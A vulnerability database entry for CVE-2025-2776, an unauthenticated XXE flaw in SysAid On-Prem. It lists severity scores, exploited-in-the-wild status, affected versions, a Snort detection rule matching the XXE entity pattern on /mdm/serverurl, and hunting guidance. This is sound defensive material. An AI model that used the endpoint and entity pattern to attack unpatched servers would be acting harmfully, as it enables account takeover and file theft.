cbcvebase.
CVE-2025-2776
published 2025-05-07

CVE-2025-2776: SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Server URL processing functionality…

PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-08-12
Exploited in the wild
EPSS
72.97%
99.4th percentile
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Server URL processing functionality, allowing for administrator account takeover and file read primitives.

Affected

2 ranges
VendorProductVersion rangeFixed in
sysaidsysaid<= 23.3.40
sysaidsysaid_on-prem<= 23.3.40

Detection & IOCsextracted from sources · hover to see the quote

url/mdm/serverurl
bytes
|3c 21|ENTITY|20 25|
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS SysAid On-Prem serverurl XML External Entity Injection (CVE-2025-2776)"; flow:established,to_server; http.uri; content:"/mdm/serverurl"; startswith; http.request_body; content:"|3c 21|ENTITY|20 25|"; fast_pattern; content:"SYSTEM"; distance:0; http.method; content:"POST"; reference:url,labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/; reference:cve,2025-2776; classtype:web-application-attack; sid:2066206; rev:1; metadata:affected_product SysAid, attack_target Server, tls_state TLSDecrypt, created_at 2025_12_09, cve CVE_2025_2777, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, updated_at 2025_12_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit traffic targets HTTP POST requests to the /mdm/serverurl endpoint on SysAid On-Prem servers; monitor for this URI with XML entity injection patterns in the request body.
  • Out-of-band XXE exploitation can be detected via SSRF callbacks; look for outbound HTTP requests with a Java User-Agent originating from the SysAid server, indicating a triggered external entity fetch.
  • The vulnerability is unauthenticated and resides in the Server URL processing functionality; no prior authentication is required to trigger the XXE, so any external access to /mdm/serverurl should be treated as suspicious.
  • MITRE ATT&CK mapping: Initial Access via Exploit Public-Facing Application (T1190, TA0001); correlate SysAid exploitation attempts with subsequent lateral movement or credential access activity.
  • ·The Snort/ET rule (sid:2066206) requires TLS decryption to be effective against HTTPS-protected SysAid instances, as indicated by the TLSDecrypt deployment metadata.
  • ·The Nuclei/interactsh-based detection relies on out-of-band callback infrastructure; it will only fire if the SysAid server can make outbound HTTP connections to the probe host.
  • ·Patched version is SysAid On-Prem 24.4.60; all instances on versions <= 23.3.40 remain vulnerable. Verify installed version before assuming coverage.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.3CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.